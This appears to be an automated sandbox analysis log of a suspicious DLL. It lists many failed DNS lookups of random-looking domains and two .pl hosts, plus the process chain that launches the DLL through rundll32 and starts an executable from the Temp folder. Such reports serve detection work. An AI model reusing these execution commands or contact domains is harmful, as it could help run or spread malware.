Dec 19, 2024 15:34:40.278978109 CET	1.1.1.1	192.168.2.9	0x74d6	Name error (3)	kpyyyy.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:40.421591043 CET	1.1.1.1	192.168.2.9	0x3c66	Name error (3)	uxbegb.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:40.518163919 CET	1.1.1.1	192.168.2.9	0xeca0	Name error (3)	giqxuy.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:40.640398979 CET	1.1.1.1	192.168.2.9	0x2d89	Name error (3)	kgvozz.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:40.754545927 CET	1.1.1.1	192.168.2.9	0x56c9	Name error (3)	sjjile.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:40.825968981 CET	1.1.1.1	192.168.2.9	0x36a7	Name error (3)	uergsz.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:40.979640961 CET	1.1.1.1	192.168.2.9	0xfa5c	Name error (3)	itmffg.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:41.060724020 CET	1.1.1.1	192.168.2.9	0xb824	Name error (3)	yivmlj.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:41.211901903 CET	1.1.1.1	192.168.2.9	0x6ece	Name error (3)	jeuiac.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:41.279735088 CET	1.1.1.1	192.168.2.9	0x6f2b	Name error (3)	uzboio.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:41.440488100 CET	1.1.1.1	192.168.2.9	0xd86c	Name error (3)	vxpesz.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:41.462709904 CET	1.1.1.1	192.168.2.9	0xc3d5	Name error (3)	tpwowx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:41.671998024 CET	1.1.1.1	192.168.2.9	0x2273	Name error (3)	raodpi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:41.701421976 CET	1.1.1.1	192.168.2.9	0x3b69	Name error (3)	lfsmdz.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:41.898536921 CET	1.1.1.1	192.168.2.9	0x9dab	Name error (3)	rhwuas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:42.079987049 CET	1.1.1.1	192.168.2.9	0x7e07	Name error (3)	fybyzv.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:42.311870098 CET	1.1.1.1	192.168.2.9	0xa3fd	Name error (3)	epgrzo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:42.536526918 CET	1.1.1.1	192.168.2.9	0x14c7	Name error (3)	zuetyk.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:47.136909008 CET	1.1.1.1	192.168.2.9	0x8a77	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:47.136909008 CET	1.1.1.1	192.168.2.9	0x8a77	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:03.350871086 CET	1.1.1.1	192.168.2.9	0x7991	Name error (3)	iqdacv.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:03.394823074 CET	1.1.1.1	192.168.2.9	0xcc0e	Name error (3)	ootumr.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:03.578607082 CET	1.1.1.1	192.168.2.9	0xe23b	Name error (3)	smhcbm.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:03.582566977 CET	1.1.1.1	192.168.2.9	0x3252	Name error (3)	hipfhf.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:03.770586967 CET	1.1.1.1	192.168.2.9	0x8dd2	Name error (3)	raygxc.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:03.800800085 CET	1.1.1.1	192.168.2.9	0x8862	Name error (3)	ahaotq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:03.952553988 CET	1.1.1.1	192.168.2.9	0x37a5	Name error (3)	dahwgm.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:04.033925056 CET	1.1.1.1	192.168.2.9	0x8948	Name error (3)	ngelut.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:04.139137030 CET	1.1.1.1	192.168.2.9	0x5ebe	Name error (3)	vnunre.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:04.238678932 CET	1.1.1.1	192.168.2.9	0x946b	Name error (3)	eupkbf.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:04.395212889 CET	1.1.1.1	192.168.2.9	0xd72	Name error (3)	fxyavq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:04.467956066 CET	1.1.1.1	192.168.2.9	0xdb50	Name error (3)	nvaijl.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:04.638103008 CET	1.1.1.1	192.168.2.9	0xdd56	Name error (3)	yovyrw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:04.682588100 CET	1.1.1.1	192.168.2.9	0xf4c4	Name error (3)	gqmneh.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:04.864712000 CET	1.1.1.1	192.168.2.9	0xf163	Name error (3)	yqhfpu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:04.883445024 CET	1.1.1.1	192.168.2.9	0xa098	Name error (3)	oxoimf.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.045619965 CET	1.1.1.1	192.168.2.9	0x8aeb	Name error (3)	ikuhms.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.068346977 CET	1.1.1.1	192.168.2.9	0x8e23	Name error (3)	bkydbf.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.245019913 CET	1.1.1.1	192.168.2.9	0xfc21	Name error (3)	siytue.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.249295950 CET	1.1.1.1	192.168.2.9	0xd32f	Name error (3)	kduiuv.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.427812099 CET	1.1.1.1	192.168.2.9	0x87b1	Name error (3)	jfppeu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.433959961 CET	1.1.1.1	192.168.2.9	0x3001	Name error (3)	zjfiqo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.609544992 CET	1.1.1.1	192.168.2.9	0x4c69	Name error (3)	phhuqd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.668299913 CET	1.1.1.1	192.168.2.9	0x968c	Name error (3)	uxohei.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.834417105 CET	1.1.1.1	192.168.2.9	0xb84c	Name error (3)	tfagrq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:05.892966032 CET	1.1.1.1	192.168.2.9	0xa920	Name error (3)	iezcob.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.055741072 CET	1.1.1.1	192.168.2.9	0xa743	Name error (3)	fncqle.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.074935913 CET	1.1.1.1	192.168.2.9	0x7465	Name error (3)	zirafk.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.289144993 CET	1.1.1.1	192.168.2.9	0x72ae	Name error (3)	gaiuio.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.306397915 CET	1.1.1.1	192.168.2.9	0xe331	Name error (3)	nsqixt.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.518754959 CET	1.1.1.1	192.168.2.9	0x1a8e	Name error (3)	cioyuk.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.536212921 CET	1.1.1.1	192.168.2.9	0xdb1b	Name error (3)	yirgbw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.699908018 CET	1.1.1.1	192.168.2.9	0xbe8c	Name error (3)	lityoa.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.754856110 CET	1.1.1.1	192.168.2.9	0xa165	Name error (3)	ohkncb.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.943458080 CET	1.1.1.1	192.168.2.9	0x20ad	Name error (3)	pugtjb.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:06.974953890 CET	1.1.1.1	192.168.2.9	0xc7bc	Name error (3)	evbzsz.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.160556078 CET	1.1.1.1	192.168.2.9	0x8beb	Name error (3)	gjtywo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.205284119 CET	1.1.1.1	192.168.2.9	0x208e	Name error (3)	xunnfu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.282627106 CET	1.1.1.1	192.168.2.9	0x4d8f	Server failure (2)	ilo.brenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.341500044 CET	1.1.1.1	192.168.2.9	0x87d	Name error (3)	zemivi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.442260981 CET	1.1.1.1	192.168.2.9	0x7cb3	Name error (3)	heupjk.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.534462929 CET	1.1.1.1	192.168.2.9	0xf243	Server failure (2)	ant.trenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.560956955 CET	1.1.1.1	192.168.2.9	0x6843	Name error (3)	bsfxpd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.622987986 CET	1.1.1.1	192.168.2.9	0xe884	Name error (3)	qlclyn.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.789011955 CET	1.1.1.1	192.168.2.9	0x6087	Name error (3)	zcuofo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.804516077 CET	1.1.1.1	192.168.2.9	0x393a	Name error (3)	zdtwjb.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:07.977781057 CET	1.1.1.1	192.168.2.9	0xeafd	Name error (3)	oehqcn.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.032006979 CET	1.1.1.1	192.168.2.9	0xb1e1	Name error (3)	iqewjg.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.171752930 CET	1.1.1.1	192.168.2.9	0xa9e0	Name error (3)	tlfjcd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.268048048 CET	1.1.1.1	192.168.2.9	0x537c	Name error (3)	zuotaq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.352608919 CET	1.1.1.1	192.168.2.9	0xfab6	Name error (3)	apqqgj.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.503804922 CET	1.1.1.1	192.168.2.9	0x7ffc	Name error (3)	oaceeo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.533628941 CET	1.1.1.1	192.168.2.9	0x74d	Name error (3)	lacjuz.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.685610056 CET	1.1.1.1	192.168.2.9	0xe2f2	Name error (3)	uqfnkt.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.716984987 CET	1.1.1.1	192.168.2.9	0x850b	Name error (3)	vezeoe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.876835108 CET	1.1.1.1	192.168.2.9	0xac35	Name error (3)	unskbm.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:08.900669098 CET	1.1.1.1	192.168.2.9	0x8d6e	Name error (3)	pimqle.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:09.094142914 CET	1.1.1.1	192.168.2.9	0xe93	Name error (3)	ivsego.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:09.149358988 CET	1.1.1.1	192.168.2.9	0x29e2	Name error (3)	ahmeqf.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:09.317775011 CET	1.1.1.1	192.168.2.9	0xadc4	Name error (3)	ltqjua.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:09.331675053 CET	1.1.1.1	192.168.2.9	0x3f6a	Name error (3)	ovprrb.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:09.542273998 CET	1.1.1.1	192.168.2.9	0x8ab1	Name error (3)	zkfevd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:09.637557983 CET	1.1.1.1	192.168.2.9	0x88d6	Name error (3)	heyanh.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:09.822566032 CET	1.1.1.1	192.168.2.9	0x9937	Name error (3)	edtlux.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:09.858601093 CET	1.1.1.1	192.168.2.9	0xcbf8	Name error (3)	bvvknd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.026566029 CET	1.1.1.1	192.168.2.9	0xc48a	Name error (3)	ikfdit.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.087979078 CET	1.1.1.1	192.168.2.9	0x32e9	Name error (3)	troslw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.255309105 CET	1.1.1.1	192.168.2.9	0x6393	Name error (3)	mbixoj.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.271501064 CET	1.1.1.1	192.168.2.9	0x43fe	Name error (3)	isaykc.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.439230919 CET	1.1.1.1	192.168.2.9	0x52d8	Name error (3)	ebuspk.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.453130960 CET	1.1.1.1	192.168.2.9	0xd9e7	Name error (3)	ynwpie.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.634955883 CET	1.1.1.1	192.168.2.9	0xe3bf	Name error (3)	rraenf.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.664942980 CET	1.1.1.1	192.168.2.9	0x14f1	Name error (3)	ymehei.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.815491915 CET	1.1.1.1	192.168.2.9	0x7883	Name error (3)	yeaedh.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:10.888297081 CET	1.1.1.1	192.168.2.9	0x4417	Name error (3)	rqicen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.034111023 CET	1.1.1.1	192.168.2.9	0xb5c8	Name error (3)	frvzle.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.118899107 CET	1.1.1.1	192.168.2.9	0xe755	Name error (3)	wmducp.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.215780020 CET	1.1.1.1	192.168.2.9	0x2b9d	Name error (3)	lanoyi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.355884075 CET	1.1.1.1	192.168.2.9	0xdfd9	Name error (3)	faweja.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.451107025 CET	1.1.1.1	192.168.2.9	0x4201	Name error (3)	oseynl.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.536396980 CET	1.1.1.1	192.168.2.9	0x5c1e	Name error (3)	msbfih.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.687649012 CET	1.1.1.1	192.168.2.9	0xa31a	Name error (3)	yhflfd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.775365114 CET	1.1.1.1	192.168.2.9	0x20c4	Name error (3)	htqqvy.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.909569025 CET	1.1.1.1	192.168.2.9	0x9ed2	Name error (3)	glsmii.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:11.997375965 CET	1.1.1.1	192.168.2.9	0x9a41	Name error (3)	upnevr.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:12.139534950 CET	1.1.1.1	192.168.2.9	0xa570	Name error (3)	yulrvp.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:12.178018093 CET	1.1.1.1	192.168.2.9	0x998f	Name error (3)	eexjix.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:12.332071066 CET	1.1.1.1	192.168.2.9	0x2c86	Name error (3)	saambd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:12.401361942 CET	1.1.1.1	192.168.2.9	0x7ed5	Name error (3)	ihybog.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:12.567636967 CET	1.1.1.1	192.168.2.9	0x3ecb	Name error (3)	qiuifw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:12.626651049 CET	1.1.1.1	192.168.2.9	0x16f8	Name error (3)	ikxyaq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:12.793734074 CET	1.1.1.1	192.168.2.9	0x2de9	Name error (3)	iemjen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:12.860377073 CET	1.1.1.1	192.168.2.9	0x39a9	Name error (3)	wxjaht.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.033847094 CET	1.1.1.1	192.168.2.9	0xbd1e	Name error (3)	eqpzuu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.082411051 CET	1.1.1.1	192.168.2.9	0x4917	Name error (3)	agjmxb.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.215399027 CET	1.1.1.1	192.168.2.9	0xee84	Name error (3)	ogvgft.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.265539885 CET	1.1.1.1	192.168.2.9	0xbdf7	Name error (3)	fidiow.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.451244116 CET	1.1.1.1	192.168.2.9	0x3e8c	Name error (3)	euekdh.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.494138956 CET	1.1.1.1	192.168.2.9	0x3120	Name error (3)	zitymm.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.686276913 CET	1.1.1.1	192.168.2.9	0xc76c	Name error (3)	cdqboa.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.722259998 CET	1.1.1.1	192.168.2.9	0xa235	Name error (3)	naxdur.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.869555950 CET	1.1.1.1	192.168.2.9	0x3dfa	Name error (3)	fzhchl.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:13.975040913 CET	1.1.1.1	192.168.2.9	0x2a5	Name error (3)	pnfkay.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:14.104053974 CET	1.1.1.1	192.168.2.9	0x854c	Name error (3)	phdomu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:14.239650965 CET	1.1.1.1	192.168.2.9	0x90d1	Name error (3)	dexric.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:14.288609982 CET	1.1.1.1	192.168.2.9	0x650c	Name error (3)	uycyms.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:14.421652079 CET	1.1.1.1	192.168.2.9	0xdf57	Name error (3)	jovlax.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:14.469636917 CET	1.1.1.1	192.168.2.9	0xe5bb	Name error (3)	qnrfpi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:14.651031017 CET	1.1.1.1	192.168.2.9	0x48a9	Name error (3)	uahnrk.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:14.713499069 CET	1.1.1.1	192.168.2.9	0x9d97	Name error (3)	cwkzpg.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:14.887837887 CET	1.1.1.1	192.168.2.9	0xd0d9	Name error (3)	hcpgso.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:14.943367958 CET	1.1.1.1	192.168.2.9	0xbecc	Name error (3)	qeixpq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:15.108603001 CET	1.1.1.1	192.168.2.9	0xbee6	Name error (3)	iaaucc.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:15.162457943 CET	1.1.1.1	192.168.2.9	0x41a6	Name error (3)	gizyod.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:15.291383028 CET	1.1.1.1	192.168.2.9	0x9845	Name error (3)	unkwhv.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:15.397140980 CET	1.1.1.1	192.168.2.9	0xdb95	Name error (3)	gabamf.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:15.511097908 CET	1.1.1.1	192.168.2.9	0xb95b	Name error (3)	yoguud.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:15.616491079 CET	1.1.1.1	192.168.2.9	0x7b77	Name error (3)	bsmxax.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:15.732256889 CET	1.1.1.1	192.168.2.9	0xcb3c	Name error (3)	xgjldw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:15.839611053 CET	1.1.1.1	192.168.2.9	0x8922	Name error (3)	aegjss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:15.914638042 CET	1.1.1.1	192.168.2.9	0x4572	Name error (3)	vzvwin.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:16.020721912 CET	1.1.1.1	192.168.2.9	0x2c73	Name error (3)	iotqbe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:16.141273022 CET	1.1.1.1	192.168.2.9	0xc472	Name error (3)	iapseh.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:16.201673985 CET	1.1.1.1	192.168.2.9	0x5a0e	Name error (3)	zsinsv.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:16.371999979 CET	1.1.1.1	192.168.2.9	0x6a77	Name error (3)	gnxmfg.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:16.432153940 CET	1.1.1.1	192.168.2.9	0xdf30	Name error (3)	ulodoa.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:16.594228029 CET	1.1.1.1	192.168.2.9	0xcb1a	Name error (3)	empymm.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:16.668313980 CET	1.1.1.1	192.168.2.9	0xf06f	Name error (3)	gnwvmu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:16.817848921 CET	1.1.1.1	192.168.2.9	0x839d	Name error (3)	uafdxu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:16.849843979 CET	1.1.1.1	192.168.2.9	0x3306	Name error (3)	anvdkc.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:17.036968946 CET	1.1.1.1	192.168.2.9	0x14f3	Name error (3)	wisllh.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:17.086853027 CET	1.1.1.1	192.168.2.9	0x1924	Name error (3)	thjvoi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:17.268016100 CET	1.1.1.1	192.168.2.9	0x50ad	Name error (3)	yokuap.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:17.497692108 CET	1.1.1.1	192.168.2.9	0x55a	Name error (3)	nxygpr.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:17.678555965 CET	1.1.1.1	192.168.2.9	0x14d8	Name error (3)	auieai.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:18.494995117 CET	1.1.1.1	192.168.2.9	0x9c27	Name error (3)	ldgoti.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:18.729051113 CET	1.1.1.1	192.168.2.9	0x5fff	Name error (3)	fzlikn.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:18.958005905 CET	1.1.1.1	192.168.2.9	0x57e1	Name error (3)	dduavk.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:19.186500072 CET	1.1.1.1	192.168.2.9	0x5c20	Name error (3)	qikggc.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:19.426672935 CET	1.1.1.1	192.168.2.9	0x93d0	Name error (3)	qyflyk.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:19.607605934 CET	1.1.1.1	192.168.2.9	0x3e99	Name error (3)	jhkuku.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:19.789875031 CET	1.1.1.1	192.168.2.9	0xc8bf	Name error (3)	eiqljd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:20.012708902 CET	1.1.1.1	192.168.2.9	0xeb3	Name error (3)	yfpqxt.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:20.804527998 CET	1.1.1.1	192.168.2.9	0x2b1c	Server failure (2)	ilo.brenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:35:20.943695068 CET	1.1.1.1	192.168.2.9	0x5d	Server failure (2)	ant.trenz.pl	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	09:33:24
Start date:	19/12/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll"
Imagebase:	0x3c0000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:33:24
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:33:24
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll",#1
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:33:24
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkDllInitialize
Imagebase:	0x960000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:33:24
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll",#1
Imagebase:	0x960000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:33:24
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\hrl97BF.tmp
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\hrl97BF.tmp
Imagebase:	0x400000
File size:	522'752 bytes
MD5 hash:	F3F920AAF85289A8E532890BC618AADD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
